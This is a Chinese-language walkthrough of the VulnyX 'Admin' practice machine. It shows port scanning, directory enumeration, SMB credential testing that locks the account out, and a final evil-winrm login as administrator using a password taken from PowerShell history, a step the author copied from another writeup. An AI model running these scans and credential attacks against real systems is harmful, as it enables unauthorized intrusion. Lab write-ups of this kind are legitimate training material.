3.Admin

1. 基本信息^toc

2. 信息收集


┌──(root㉿kali)-[~/Desktop/vulnyx/Admin]
└─# nmap -sCV 192.168.56.20
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-22 23:28 EST
Nmap scan report for 192.168.56.20
Host is up (0.00076s latency).
Not shown: 996 closed tcp ports (reset)
PORT    STATE SERVICE       VERSION
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows
|_http-server-header: Microsoft-IIS/10.0
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
MAC Address: 08:00:27:5E:A6:CF (Oracle VirtualBox virtual NIC)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: ADMIN, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:5e:a6:cf (Oracle VirtualBox virtual NIC)
|_clock-skew: 6h59m58s
| smb2-time:
|   date: 2024-12-23T11:28:57
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.13 seconds

2.1. 目录扫描

┌──(root㉿kali)-[~/Desktop/vulnyx/Admin]
└─# gobuster dir -u http://192.168.56.20/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,zip
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.20/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,txt,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/tasks.txt            (Status: 200) [Size: 98]
/Tasks.txt            (Status: 200) [Size: 98]


┌──(root㉿kali)-[~/Desktop/vulnyx/Admin]
└─# curl http://192.168.56.20/tasks.txt
Pending tasks:

 - Finish website
 - Update OS
 - Drink coffee
 - Rest
 - Change password

By hope

获取到了一个用户名 hope

2.2. smb空会话检测


┌──(root㉿kali)-[~/Desktop/vulnyx/Admin]
└─# smbmap -H 192.168.56.20 -u guest -p ' '

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.5 | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[\] Checking for open ports...                                                                         [*] Detected 1 hosts serving SMB
[|] Initializing hosts...                                                                              [/] Authenticating...                                                                                  [-] Authenticating...                                                                                  [\] Authenticating...                                                                                  [*] Established 1 SMB connections(s) and 0 authenticated session(s)
[|] Closing connections..                                                                              [/] Closing connections..                                                                              [-] Closing connections..                                                                              [*] Closed 1 connections

看来不存在

3. smb爆破

既然获取到了用户名
那么可以尝试进行爆破

┌──(root㉿kali)-[~/Desktop/vulnyx/Admin]
└─# crackmapexec smb 192.168.56.20 -u 'hope' -p 'loser'
SMB         192.168.56.20   445    ADMIN            [*] Windows 10 / Server 2019 Build 19041 x64 (name:ADMIN) (domain:ADMIN) (signing:False) (SMBv1:False)
SMB         192.168.56.20   445    ADMIN            [-] ADMIN\hope:loser STATUS_ACCOUNT_LOCKED_OUT
Warning

这里正常是可以爆破出Hope用户的密码 loser
但是我靶机可能出问题了 用这个密码登录不上去。 试了下爆破其他的密码 但是爆破不了

4. 提权

这里由于我Hope用户无法登录,所以无法完成。直接看的wp
https://d4t4s3c.medium.com/vulnyx-admin-walkthrough-66fc5891bec0
winrm上去后
利用 winpeas检测 可以获取到管理员的执行Powershell的历史记录
里面有他的账号密码

Pasted image 20241223125754.png

然后利用winrm连接去上即可

┌──(root㉿kali)-[~/Desktop/vulnyx/Admin]
└─# evil-winrm -i 192.168.56.20 -u administrator -p SuperAdministrator123

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\administrator\Documents> whoami
admin\administrator
*Evil-WinRM* PS C:\Users\administrator\Documents>